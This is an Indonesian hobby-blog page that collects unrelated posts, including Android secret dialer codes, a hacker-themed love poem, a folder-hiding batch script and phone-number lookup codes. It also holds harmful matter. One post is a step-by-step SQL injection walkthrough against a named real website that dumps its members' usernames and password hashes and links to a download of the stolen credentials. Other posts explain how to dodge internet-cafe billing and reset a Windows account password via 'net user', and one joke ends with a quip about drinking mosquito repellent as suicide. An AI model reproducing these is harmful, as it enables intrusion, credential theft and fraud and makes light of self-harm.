yuuk belajar bareng.. ^_^


Kode Rahasia Android
informasi ini ditujukan untuk pengguna berpengalaman. Tidak dimaksudkan untuk pengguna dasar, hacker, atau mencuri ponsel. Tolong jangan mencoba salah satu metode berikut jika Anda tidak akrab dengan kode-kode rahasia ponsel. Amatir tidak akan bertanggung jawab atas penggunaan atau penyalahgunaan informasi ini, termasuk kehilangan data atau kerusakan hardware. Dengan demikian, risiko adalah milikmu sendiri.
Android Secret Code Berikut adalah kode rahasia tersembunyi yang dapat digunakan pada ponsel Google Android OS ( hanphone android dengan system operasi android ), akses ke hal-hal yang tidak dapat diakses secara default.

berikut kodenya:

Informasi tentang ponsel dan baterai
* # * # 4636 # * # *

Hal ini menunjukkan empat berikut menu di layar:
* Telepon Informasi
* Informasi baterai
* Sejarah Baterai
* Statistik

Reset data seperti asal
* # * # 7780 # * # *

Ini akan menghapus sebagai berikut:
* Google pengaturan account yang disimpan di telepon Anda
* Sistem dan aplikasi data dan pengaturan
* Aplikasi yang Download
dan TIDAK akan menghapus:
* Sistem perangkat lunak saat ini dan paket aplikasi
* SD Card file seperti foto, file musik, dll

Catatan: Setelah Anda memberikan kode ini, Anda mendapatkan prompt pada layar meminta Anda untuk mengklik pada tombol "Reset Telepon". Jadi Anda mendapatkan kesempatan untuk membatalkan operasi Anda.

Format produsen asli
* 2767 * 3855 #

Pikirkan sebelum Anda memberikan kode ini. Ini akan menghapus semua file dan pengaturan, termasuk penyimpanan memori internal. Ini juga akan menginstal ulang firmware telepon.

Catatan: Setelah Anda memberikan kode ini, tidak ada cara untuk membatalkan operasi kecuali jika Anda melepas baterai dari telepon. Jadi berpikir dua kali sebelum memberikan kode ini.

Informasi tentang ponsel kamera
* # * # 34971539 # * # *

Kode ini menunjukkan menu berikut empat:
* Update firmware dari kamera dalam gambar (Jangan mencoba opsi ini)
* Update firmware kamera di kartu SD
* Dapatkan versi firmware kamera
* Dapatkan hitungan update firmware

PERINGATAN: Jangan gunakan opsi pertama dinyatakan, ponsel kamera akan berhenti bekerja dan Anda akan perlu membawa telepon ke layanan / toko untuk menginstal ulang firmware kamera.

Kode ini dapat digunakan untuk mengubah "End Call / Power"
* # * # 7594 # * # *

Kode ini dapat digunakan untuk mengubah "End Call / Power" tindakan pada keypad ponsel Anda. Jadi default, jika Anda menekan tombol untuk beberapa saat, ia akan menampilkan layar yang meminta Anda untuk memilih pilihan dari mode Diam, dan Matikan telepon Airplane mode.
Anda dapat mengubah tindakan menggunakan kode ini. Anda dapat mengaktifkan kekuatan ini secara langsung dari tombol sehingga Anda tidak perlu membuang waktu Anda dalam memilih pilihan.

Buka layar di mana file copy
* # * # 273 283 * 255 * 663 282 *#*#*


Layanan modus log
* # * # 197328640 # * # *

Anda dapat menjalankan berbagai tes dan perubahan pengaturan dalam modus layanan.

Uji Kode: WLAN, GPS dan Bluetooth
* # * # 232339 # * # * - tes WLAN
* # * # 526 # * # * - tes WLAN
* # * # 528 # * # * - tes WLAN (Gunakan "Menu" untuk meluncurkan berbagai uji)
* # * # 232338 # * # * - Menampilkan alamat MAC dari WiFi
* # * # 1472365 # * # * - tes GPS
* # * # 1575 # * # * - tes GPS lain.
* # * # 232331 # * # * - tes Bluetooth
* # * # 232337 # * # - Menampilkan alamat Bluetooth

Peluncuran GTalk Service Monitor
* # * # 8255 # * # *

Kode untuk mendapatkan informasi versi firmware:
* # * # 4986 * 2650468 # * # * - PDA, Telepon, H / W, RFCallDate
* # * # 1234 # * # * - PDA dan Telepon
* # * # 1111 # * # * - FTA BD Versi
* # * # 2222 # * # * - FTA HW Version
* # * # 44336 # * # * - PDA, Telepon, CSC, Membangun Waktu, nomor daftar perubahan.

Kode untuk meluncurkan berbagai Pabrik Tes:
* # * # 0283 # * # * - Loopback paket
* # * # 0 *#*#* - LCD tes
* # * # 0673 # * # * atau * # * # 0289 # * # * - tes Melody
* # * # 0842 # * # * - tes Device (Getaran, dan Backlight test)
* # * # 2663 # * # * - Touch versi layar
* # * # 2664 # * # * - Layar sentuh tes
* # * # 0588 # * # * - Sensor jarak tes
* # * # 3264 # * # * - RAM versi



CARA MENG - HaCK Cwe................

LANGKAH LANGKAH

1. kumpulin info.

tool : temen-temen target, Yellow pages, Google, FS,FB dsb..
Grinusage : nama, alamat, ttl dll

2. Scanning Target.

tool : Teropong
Usage : 30 meter dari target, scan bagian2 yg penting

3. Coba masuk ke system hati dan injeksi dengan kata-kata manis yang meluluhkan hati

tool : mulut, buku puisi,HP
Usage : pandai2 aja cari bahan obrolan sekalian luluhkan Hatinya dengan Shell yang lo miliki

4. Bikin backdoor

tool : HP
Usage : Rajin2 sms n telpon tiap sabtu biar gk ngabisin pulsa wkwkwwk

5. Bikin akses Root

Tool : dompet tebal, <<< uang receh atau kertas aja
Usage : jgn pelit2 traktirnya << traktir di warung kopi aja gk usah di REsto

6. Lock the target

Tool : Mulut,Social Enginer (bagi yang gk PD)
Usage : Say I Love U... + kekuranganmu supaya dia gk kecewa nantinya

7. Alternative Ways

Tool : CAin And Abel,Hacking Tools
usage : Hack FB,FS atau apalah kalau di tolak

klo langkah2 diatas pada gagal....coba yang dibawah ini

Suicide
Tool : Obat Nyamuk
Usage : Diminum kalau udah pake dukun masih ga mempan... :mngakak:




Puisi Hacker jatuh cinta



Seandainya hatimu adalah sebuah system, maka aku akan scan kamu
untuk mengetahui port mana yang terbuka Sehingga tidak ada
keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping
di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku
seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu,
pake PHP injection Terus aku ls -la; find / -perm 777 -type d,
sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau
adakah free space buat aku?. apa aku harus pasang backdor "Remote Connect-Back Shell"
jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,
aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu
aku akan pasang portsentry, dan menyeting error pagemu
" The page cannot be found Coz Has Been Owned by Someone get out!"
aku janji gak bakalan ada macelinious program atau service yang hidden,
karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....!
kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah
terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat
menangkalnya selain ...kamu.




Cara Ngenet Gratis di Warnet Orang


biar bisa internetan gratis di warnet
udah di coba di 3 warnet terkenal seperti devil,qnox and klik net ternyata berhasil
langsung aja ke TKP
1-3
:D

1. Siapkan muka tembok dan jalan-jalanlah ke warnet (Kenapa harus muka tembok kok bukan genteng? ya, biar kalo ketahuan pasang aja muka tembok and pura-pura gak tahu) hehehe

2. Login di salah satu komputer (jangan dua ntar kemahalan). Kalau ada pertanyaan kok harus login? Bayar Dong? Ya iyalah gan masa pengennya syang gratisan muluk (modal napa) kalau ada warnet yang 5 menit pertama gratis tips ini bisa-bisa gratis

3. Buka text editor atau microsoft Word trus ketik apa aja di text editor tersebut (terserah gan mau ngarang apa aja gak masalah) TAPI INGAT JANGAN DISIMPAN DAN JANGAN DITUTUP


4-6

4. Langkah selanjutnya silahkan Logout / Keluar dari sistem billing yang sedang berjalan (INGAT LAGI TANPA MENUTUP TEXT EDITOR YANG TADI)

5. Setelah layar tertutup oleh Billing, Jangan binggung dulu. Langsung tekan tombol POWER Pada pc yang anda pakai

6. Setelah tombol Power ditekan maka billing akan otomatis tertutup dan Windows akan memaksa menutup semua program TERMASUK TEXT EDITOR YANG TADI KITA BUKA


7-9

7. Setelah muncul konfirmasi Apakah File Text edit yang kita buka tadi mau disimpan? Klik aja Cancel

8. Hehehe Sekarang anda bisa ber internetan, Chatting, Browsing, Facebooking, Pidging dan lain-lain Terserah anda

9. Hati-hati Operator warnet curiga karena billing gak jalan .... hehehehehe


and....
Selamat mencoba Semoga Sukses


Nah, Kalau Ketahuan yang jaga Bilang Aja. Gak tahu mbak/mas Kenapa kok gini dari tadi, Trus pasang tuh muka temboknya (alias tampang culunnya).


hmm ,saran ane
Kalau anda ketahuan,
JANGAN KEMBALI LAGI KE WARNET ITU

(saran terakhir adalah saran utama yang perlu di ketahui)

#ngakak dulu




Menyembunyikan File/Folder dgn menggunakan notepad (tanpa guna software)




Jika anda memiliki file-file rahasia dikomputer yang tidak ingin orang lain tahu anda boleh menyembunyikan atau menguncinya dengan bantuan notepad tanpa perlu menggunakan software-software locker.
Iut cara ini ^^

Buka notepad & copy code script berikut:

CLS
@ECHO OFF
Title Folder My-Privacy-Folder
If EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto SANDINYA
If NOT EXIST My-Privacy-Folder goto MDFOLDER
:KONFIRMASI
Echo Apakah Anda ingin mengunci My-Privacy-Folder ini ? (Y/N)
Echo Tekan Tombol [Y/y] atau [N/n].
Set/p "cho=>"
If %cho%==Y goto KUNCI
If %cho%==y goto KUNCI
If %cho%==N goto END
If %cho%==n goto END
Goto KONFIRMASI
:KUNCI
Ren My-Privacy-Folder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
Attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
Echo My-Privacy-Folder Terkunci
Goto End
:SANDINYA
Echo Masukkan Password Anda!!
Set/p "pass=>"
If %pass%== Password anda disini goto BUKA
If NOT %pass%== Password anda disini goto SALAH
:BUKA
Attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
Ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" My-Privacy-Folder
Echo My-Privacy-Folder sudah di buka
Pause
Goto End
:SALAH
Echo Maaf Password Anda Salah !!!
Pause
Goto End
:MDFOLDER
Md My-Privacy-Folder
Echo My-Privacy-Folder berhasil dibuat.
Pause
Goto End
:End

ganti 2 tulisan "Password Anda Disini" (yang berwarna hitam) dengan password anda yang ingin dipakai. Contohnya:

If %pass%== fortress100 goto BUKA
If NOT %pass%== fortress100 goto SALAH

Simpan dengan nama Echo-rzw.bat.
Buka kembali file Echo-rzw dengan cara klik kanan open (jangan terbiasa dengan double klik), setelah terbuka tekan tombol apa saja.
File Echo-rzw akan mengeluarkan sebuah folder yang bernama My-privacy-folder (ingat jangan direname apabila tidak ingin error), pastu  masukkan file-file penting anda di folder tersebut.
Buka lagi file Echo-rzw lalu masukkan huruf Y atau y, maka folder My-privacy-folder akan terkunci & tersembunyi.
untuk membuka folder tersebut tinggal buka lagi file Echo-rzw dan masukkan password anda.
Jika ingin lebih selamat  lagi hidden file Echo-rzw dengan cara klik kanan pada filenya pilih properties dan klik  atribute hidden.
Jadi jika ingin membuka file tersebut anda harus mulai dari menu windows eksplorer pilih tools-folder options-view-shows hiddens file and folder, klik apply-OK.


Semoga Berjaya ^_^




Lupa Password lappy?



Dah tak perlu hack2 sana sini :)

[1]
Pergi ke Start - Run .... Kemudian taip CMD. tekan enter

[2]
Kemudian taip Net User 

[3]
Kemudian tengok semua list user yang diguna pakai. Pilih akaun user mana yang ingin dipecahkan

[4]
Kemudian taip net user [UserNameHere]* contoh: net user Administrator *

[5]
Kemudian tekan enter tiga kali tanpa menaip apa-apa... (ataupun kamu taip jer apa-apa password lain yang kamu ingin ubah. Password akan tertukar)
cara ni juga boleh digunakan dalam CMD system.... OK





tau denger SQL ga ??


yuuk mari baca documen lama saya yang q post di blackcode..
^_^

sebelumnya saia juga takut mo review ini tapi kita semua harus tau tentang ini karna barang kali kita menjadi suatu admin perusahaan bagian web..wooww..mantaabb..!!! oke saia tidak akan banyak cincong.... nih alamat web target.... http://stormnigeria.com/music/newsdetail.php?id=15(untuk alamat bisa anda cari sendiri tergantung kreatifitas) langkahnya:
1. cek dulu apakah website tuh error sqlnya? http://stormnigeria.com/music/newsdetail.php?id=15' (tanda (') adalah untuk mengetahui apakah web target error sqlnya or tidak) jika muncul kalimat You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `date` DESC' at line 1 berarti web target sqlnya error or kalimat yang lainnya yang menunjukan sqlnya tuh error maka...lanjuutt... 2.kita cari column dengan perintah order by.. oh iya, order by kita gunakan untuk mengurutkan column, jadi jika perintahnya order by 5, maka column yang pertama muncul diurutkan dari column ke-5..atau dalam kata lain kita mencari batasan dari kolom table(menebak2 angka) misalnya pada target kita ini saia pakehttp://stormnigeria.com/music/newsdetail.php?id=15%20order%20by%207-- ternyata muncul pesan Unknown column '7' in 'order clause' lalu ane coba lagi http://stormnigeria.com/music/newsdetail.php?id=15%20order%20by%206-- muncul pesan yang sama juga nah setelah ane pakehttp://stormnigeria.com/music/newsdetail.php?id=15%20order%20by%205-- website dalam keadaan normal kembali.. intinya disini target menggunakan 5colomn..maka setelah itu..lanjuutt..... 3. sekarang kita lakukan perintah union select diakhiri urutan column dari pertama sampai terakhir, gunanya untuk melihat di angka mana kita bisa lakukan injeksi.. jangan lupa tambahkan tanda "-" diawal angka parameter id, contohnya http://stormnigeria.com/music/newsdetail.php?id=-15 dalam prakteknya kita ketikan http://stormnigeria.com/music/newsdetail.php?id=-15%20union%20select%201,2,3,4,5-- nah tuh "angka ajaibnya" yaitu 2 dan 3, disitu kita akan lakukan injeksi kita akan melihat versi databasenya, karena lebih mudah jika database versi 5.. lebih mudah versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.. 4.@@version adalah command untuk melihat versi database.. bisa juga dengan menggunakan perintah version().. dalam prakteknyahttp://stormnigeria.com/music/newsdetail.php?id=-15%20union%20select%201,@@version,3,4,5-- maka di web target muncul 5.0.27-standard-log menandaan bahwa web target menggunakan database versi 5..lanjuut... 5. sekarang kita akan mencari table dari information_schema dengan memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()-- dalam prakteknyahttp://stormnigeria.com/music/newsdetail.php?id=-15%20union%20select%201, group_concat(table_name),3,4,5%20from%20information_schema.tables %20where%20table_schema=database()-- nah keliatan tuh haslnya...artists,members,news,newscomments,videocomments,videos wewww..ada database members euy...meski bukan admin tapi lumayan lah buat diintiip..heuheuheueheu Laughing Laughing ..lanjuutt... 6.sekarang kita akan mengintip informasi di dalam table members, pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table' dalam prakteknyahttp://stormnigeria.com/music/newsdetail.php?id=-15%20union%20select%201, group_concat(column_name),3,4,5%20from%20 information_schema.columns %20where%20table_name=%27members%27-- wwaawww... error! table 'members' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL.. dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa.. untuk menconvertnya kita tinggal ketikan text to hex convert di paman google yah jangan lupa berterima kasih..heuheuheu setelah ane convert kata members ke hexa menjadi 6d656d62657273 terimakasih paman google...lanjuutt... 7. setelah mengkonvert lakukan perintah ini nih.. http://stormnigeria.com/music/newsdetail.php?id=-15%20union%20select%201, group_concat(column_name),3,4,5%20from%20 information_schema.columns%20where%20table_name=0x6d656d62657273%20%20-- heuheuheueheuhe..he..he.. ada username and paswordnya si members... id,username,password,f_name,l_name,email,dob,sex,address,city,country,aboutme,profilepicture,active_usr,random_usr Laughing Laughing nah sekarang kita intiip tuh username and paswordnya ..btw isinya apa ya...?mo tau ..lanjuuttt 8. perintahnya: group_concat(username,0x3a,password) tambahkan diakhir URL from members dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from members adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama members.. http://stormnigeria.com/music/newsdetail.php?id=-15%20union%20select%201,group_concat (username,0x3a,password),3,4,5%20from%20members-- wakakakakkak... dapet dech informasi login members dan passwordnya.. sekarang kita akan login sebagai members, namun user members telah terenkripsi dengan MD5, jadi untuk cara yang lebih cepat, kita download hasil kerjaannya saia...http://www.ziddu.com/download/4675144/mantabenaneuoy.txt.htmlsetelah ane masuk dari salah satu user diatas (dari downloadan) maka hasilnya....



yuuk mari baca²

=))
semoga bermanfaat


cara mudah untuk mengetahui nomor HP sendiri: untuk Rakyat Indonesia hehe


Untuk nomor MENTARI dan IM3.

Cukup ketik *777*8# dan CALL/OK

Untuk TELKOMSEL.

Ketik *808# dan CALL/OK

Untuk XL

Ketik *123*6*3*1*1# atau *123*22*1*1# dan CALL/OK

Untuk AXIS

Ketik *2# dan CALL/OK

Untuk [3] THREE

Ketik *998#
Kalau Fren kirim sms lalu ketik STATUS kirim ke 551

Gabung di group yuuk belajar bareng.. ^_^ 

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free Download | Bloggerized by Mahdi - Exclusive Blogger Themes | Mahdi